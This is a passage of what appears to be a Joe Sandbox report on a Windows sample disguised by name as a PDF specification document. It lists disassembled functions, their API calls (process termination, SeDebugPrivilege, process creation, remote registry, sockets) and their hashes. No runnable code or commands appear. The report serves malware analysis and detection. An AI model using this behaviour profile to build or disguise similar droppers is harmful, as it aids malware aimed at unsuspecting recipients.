                                      • Opcode Fuzzy Hash: 664b9b0ecf5dafea2a0cd5667fb67b6f504f49d147a45a5ff9fccc18ba93938a
                                      • Instruction Fuzzy Hash: 5AF15D75A00209EFCF05DF94D988EAEB7B9FF89315F118498F915AB250DB31AE41CB90
                                      Function 003AB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                      Download Yara Rule
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003AB3F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: 724b32f226c746ce4db4f2ade59ea3c0a0aa6ec532a7d2b6bc3c6ba59082274e
                                      • Instruction ID: 4110de587600ede52eb041b1fc05b3a16f49eabecf2c5c58819a3d21632423ab
                                      • Opcode Fuzzy Hash: 724b32f226c746ce4db4f2ade59ea3c0a0aa6ec532a7d2b6bc3c6ba59082274e
                                      • Instruction Fuzzy Hash: 09517C34A00204BFEF279F29CC89FA9BB68EB07314F644115FA55EA5E3C771E9508B51
                                      Function 0035A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 003BDB1B
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003BDB3C
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003BDB51
                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 003BDB6E
                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003BDB95
                                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0035A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003BDBA0
                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003BDBBD
                                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0035A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003BDBC8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                      • String ID:
                                      • API String ID: 1268354404-0
                                      • Opcode ID: c5d54778283d15492b189313df79fa81726cc58ef10a1e98b925ceaa28cab423
                                      • Instruction ID: e270495289bcc913afb9c3c4479fa85feb282dcfd5ce88f9562e2c04ebdb0371
                                      • Opcode Fuzzy Hash: c5d54778283d15492b189313df79fa81726cc58ef10a1e98b925ceaa28cab423
                                      • Instruction Fuzzy Hash: 69518C70600608EFDB26DF64CC81FAA77B9AB48755F110628FA46DB6A0D770ED44DB50
                                      Function 0035EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,003BDAD1,00000004,00000000,00000000), ref: 0035EAEB
                                      • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,003BDAD1,00000004,00000000,00000000), ref: 0035EB32
                                      • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,003BDAD1,00000004,00000000,00000000), ref: 003BDC86
                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,003BDAD1,00000004,00000000,00000000), ref: 003BDCF2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: c52d07fe6d74e8509d3b1ed20e82efb9ebf8be07e71cb5c46a713a6f7ded9aa8
                                      • Instruction ID: 06d4b648be606e335f7d5e2adc09f6898ba37edf379119cb099d2df977f99a21
                                      • Opcode Fuzzy Hash: c52d07fe6d74e8509d3b1ed20e82efb9ebf8be07e71cb5c46a713a6f7ded9aa8
                                      • Instruction Fuzzy Hash: 3F41E47060C280DBD73F4B288D8DE6A7A9EAB41307F1A081DF98786D71D671BA48C311
                                      Function 0037B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0037AEF1,00000B00,?,?), ref: 0037B26C
                                      • HeapAlloc.KERNEL32(00000000,?,0037AEF1,00000B00,?,?), ref: 0037B273
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0037AEF1,00000B00,?,?), ref: 0037B288
                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0037AEF1,00000B00,?,?), ref: 0037B290
                                      • DuplicateHandle.KERNEL32(00000000,?,0037AEF1,00000B00,?,?), ref: 0037B293
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0037AEF1,00000B00,?,?), ref: 0037B2A3
                                      • GetCurrentProcess.KERNEL32(0037AEF1,00000000,?,0037AEF1,00000B00,?,?), ref: 0037B2AB
                                      • DuplicateHandle.KERNEL32(00000000,?,0037AEF1,00000B00,?,?), ref: 0037B2AE
                                      • CreateThread.KERNEL32(00000000,00000000,0037B2D4,00000000,00000000,00000000), ref: 0037B2C8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                      • String ID:
                                      • API String ID: 1957940570-0
                                      • Opcode ID: 93a5d16d1c19976c931772a9e4c21472a55ffe7dd6f0bc5956ec18ab4e20e494
                                      • Instruction ID: 4e953b330a22574a716e57b2115041de15c976722771aebc4e047e26440c4366
                                      • Opcode Fuzzy Hash: 93a5d16d1c19976c931772a9e4c21472a55ffe7dd6f0bc5956ec18ab4e20e494
                                      • Instruction Fuzzy Hash: D601C9B5240348BFE711AFA5DC4DF6B7BACEB88711F058425FA05DB1A1CA74E801CB61
                                      Function 0036821F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 145fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,00400312,00000104,00000000,00000001,00000000), ref: 003682B1
                                      • GetStdHandle.KERNEL32(000000F4,00000000,00000001,00000000), ref: 0036836B
                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 003683BA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: File$HandleModuleNameWrite
                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                      • API String ID: 3784150691-4022980321
                                      • Opcode ID: 5ec60939089c2adb7c22090b725db17e5bfa59cbbfcdc6327a04628a8b8f7293
                                      • Instruction ID: 3219c8537cba42af2c0ab7c75903a9813bd466dc91c0665979b82bd08366f8f6
                                      • Opcode Fuzzy Hash: 5ec60939089c2adb7c22090b725db17e5bfa59cbbfcdc6327a04628a8b8f7293
                                      • Instruction Fuzzy Hash: A1415979A402157AD72367685C56FEF325C9B0AB10F258239FC04F62CAEEB49E404299
                                      Function 003A172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00386532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00386554
                                        • Part of subcall function 00386532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00386564
                                        • Part of subcall function 00386532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003865F9
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003A179A
                                      • GetLastError.KERNEL32 ref: 003A17AD
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003A17D9
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 003A1855
                                      • GetLastError.KERNEL32(00000000), ref: 003A1860
                                      • CloseHandle.KERNEL32(00000000), ref: 003A1895
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 2533919879-2896544425
                                      • Opcode ID: f2994f5a32d92065f44ca3fe6a6bf77d012262e440a2110ac58fa5ec0fb926f7
                                      • Instruction ID: aacd65a432827568298e8bf195032dff39d469a5fe3427902f5ac52ff7c80a61
                                      • Opcode Fuzzy Hash: f2994f5a32d92065f44ca3fe6a6bf77d012262e440a2110ac58fa5ec0fb926f7
                                      • Instruction Fuzzy Hash: CC41E175600200AFDB07EF54CC95FAEB7A9EF45700F098098F9069F2D2DB79A904CB91
                                      Function 003A24D4 Relevance: 12.4, APIs: 8, Instructions: 376processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003A2688
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003A26AC
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003A26EC
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003A270E
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003A286F
                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003A28A1
                                      • CloseHandle.KERNEL32(?), ref: 003A28D0
                                      • CloseHandle.KERNEL32(?), ref: 003A2947
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess
                                      • String ID:
                                      • API String ID: 2947177986-0
                                      • Opcode ID: 8f28098166dbba08418e870a91814e507d2b550c3b0c48bf0a13a2abbfd2406f
                                      • Instruction ID: 3b9d39897cb8be237bb81bbf5662472535fededceb440bc98ab40426541f0a3b
                                      • Opcode Fuzzy Hash: 8f28098166dbba08418e870a91814e507d2b550c3b0c48bf0a13a2abbfd2406f
                                      • Instruction Fuzzy Hash: 28D19E356043009FC716EF28C851A6ABBE5EF86310F15895DF8999F2A2DB31ED44CB52
                                      Function 00385819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadIconW.USER32(00000000,00007F03), ref: 003858B8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2457776203-404129466
                                      • Opcode ID: 770d640ef5a6895fd36a089a30e284d0fbed5b96ab4a56c74786120df363ad00
                                      • Instruction ID: cd4c58f2df22d6563bb6bec1ba97442e5ff6433f8dda4dd2da6fd2a1e6535985
                                      • Opcode Fuzzy Hash: 770d640ef5a6895fd36a089a30e284d0fbed5b96ab4a56c74786120df363ad00
                                      • Instruction Fuzzy Hash: 0011D63670DB46FAE7176B549C83DAB779C9F25724F2000BBF611FA281E7B0AA004765
                                      Function 0038A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0038A806
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ArraySafeVartype
                                      • String ID:
                                      • API String ID: 1725837607-0
                                      • Opcode ID: e92e22537940b94113a1a16be05ec1dcc99730f38560d078b0c93966a21d2f17
                                      • Instruction ID: 5977617bff30cc6dcb5251928ca2f84f36160dde4de5abcffe1bb1a914fd2ea8
                                      • Opcode Fuzzy Hash: e92e22537940b94113a1a16be05ec1dcc99730f38560d078b0c93966a21d2f17
                                      • Instruction Fuzzy Hash: 26C1B175904709DFEB06EF94C481BAEB7F4FF08315F2440AAE605EB251D734AA46CB91
                                      Function 003A2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 003A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A2BF6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharConnectRegistryUpper
                                      • String ID:
                                      • API String ID: 2595220575-0
                                      • Opcode ID: ded6f493293875803a31399d70b8555517ecc1c5b51f068309f98245e33a2584
                                      • Instruction ID: 410f514dd05c71118c41fd6568d337f6bb0f0ebe393afd97f0927446f033f5a0
                                      • Opcode Fuzzy Hash: ded6f493293875803a31399d70b8555517ecc1c5b51f068309f98245e33a2584
                                      • Instruction Fuzzy Hash: 76916B752042019FCB12EF58C891F6EB7E5FF89310F04885DF9A69B2A2DB34E945CB42
                                      Function 003A8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 003A8EE4
                                      • GetDC.USER32(00000000), ref: 003A8EEC
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003A8EF7
                                      • ReleaseDC.USER32(00000000,00000000), ref: 003A8F03
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 003A8F3F
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003A8F50
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003ABD19,?,?,000000FF,00000000,?,000000FF,?), ref: 003A8F8A
                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003A8FAA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                      • String ID:
                                      • API String ID: 3864802216-0
                                      • Opcode ID: 8a1a55ab1280c93704f44b365ba558e28cf1ad057ab16dee2f3044e1253f3344
                                      • Instruction ID: b206bb6dbb6d188f0b53b1e9b5e8c75acc8f36745433df90ea34951723a39609
                                      • Opcode Fuzzy Hash: 8a1a55ab1280c93704f44b365ba558e28cf1ad057ab16dee2f3044e1253f3344
                                      • Instruction Fuzzy Hash: 4031AE72200214BFEB128F54DC4AFEB3BADEF4A715F054065FE48DA291CAB5A841CB70
                                      Function 00367035 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedDecrement.KERNEL32(?), ref: 0036704D
                                      • InterlockedDecrement.KERNEL32(00000000), ref: 00367058
                                      • InterlockedDecrement.KERNEL32(?), ref: 00367065
                                      • InterlockedDecrement.KERNEL32(00000000), ref: 00367070
                                      • InterlockedDecrement.KERNEL32(?), ref: 0036707D
                                      • InterlockedDecrement.KERNEL32(?), ref: 00367098
                                      • InterlockedDecrement.KERNEL32(00000000), ref: 003670AC
                                      • InterlockedDecrement.KERNEL32(?), ref: 003670C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: DecrementInterlocked
                                      • String ID:
                                      • API String ID: 3448037634-0
                                      • Opcode ID: 15e8d419d7d0beb2705db05ebfca7259a77d11d8f33eeaecf8751f04710f0f3a
                                      • Instruction ID: e9bc0dce0d471d8596aab8471f23d28cac7659b0cd6e18fdb7a28907ec030fc4
                                      • Opcode Fuzzy Hash: 15e8d419d7d0beb2705db05ebfca7259a77d11d8f33eeaecf8751f04710f0f3a
                                      • Instruction Fuzzy Hash: A3114C305006089BDB33AF29CC88BAAF7E8AF40748F96C42AE545D6164C775AC84CF70
                                      Function 00366E4B Relevance: 12.1, APIs: 8, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedIncrement.KERNEL32(00000000), ref: 00366E5B
                                      • InterlockedIncrement.KERNEL32(?), ref: 00366E66
                                      • InterlockedIncrement.KERNEL32(?), ref: 00366E73
                                      • InterlockedIncrement.KERNEL32(?), ref: 00366E7E
                                      • InterlockedIncrement.KERNEL32(?), ref: 00366E8B
                                      • InterlockedIncrement.KERNEL32(0000001C), ref: 00366EA6
                                      • InterlockedIncrement.KERNEL32(?), ref: 00366EBA
                                      • InterlockedIncrement.KERNEL32(?), ref: 00366ED4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: IncrementInterlocked
                                      • String ID:
                                      • API String ID: 3508698243-0
                                      • Opcode ID: 15881d8e3dff222f0dcae298e9dd5d06752c97e70c766b775ae040b7c2978adf
                                      • Instruction ID: 6f17e560cfac103cee9c988bab1a0e951a136a35c25fa37b4f6278396cb5dae7
                                      • Opcode Fuzzy Hash: 15881d8e3dff222f0dcae298e9dd5d06752c97e70c766b775ae040b7c2978adf
                                      • Instruction Fuzzy Hash: F6112E35900619EBDB129F29CD89B9ABBE8FF04384F05C066E404C6564C775A8A4CFE0
                                      Function 0039C43F Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 401COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: NULL Pointer assignment$Not an Object type
                                      • API String ID: 0-572801152
                                      • Opcode ID: a8dfe5555046fb6ea6e134a374ef79c774670d38a8290586add8e82c10c8ee7d
                                      • Instruction ID: 1c0f68126f59e6148bdbbc5d388cf45ce5e7997e515cf6e73840af3e97706492
                                      • Opcode Fuzzy Hash: a8dfe5555046fb6ea6e134a374ef79c774670d38a8290586add8e82c10c8ee7d
                                      • Instruction Fuzzy Hash: 3FE1F471A1021AAFDF16DFA8C881BEE77B9EF48354F158029F905AB281D770AD41CB90
                                      Function 003995BF Relevance: 10.7, APIs: 7, Instructions: 247networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • select.WSOCK32 ref: 00399691
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0039969E
                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 003996C8
                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003996E9
                                      • WSAGetLastError.WSOCK32(00000000), ref: 003996F8
                                      • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,003DDC00), ref: 00399765
                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 003997AA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
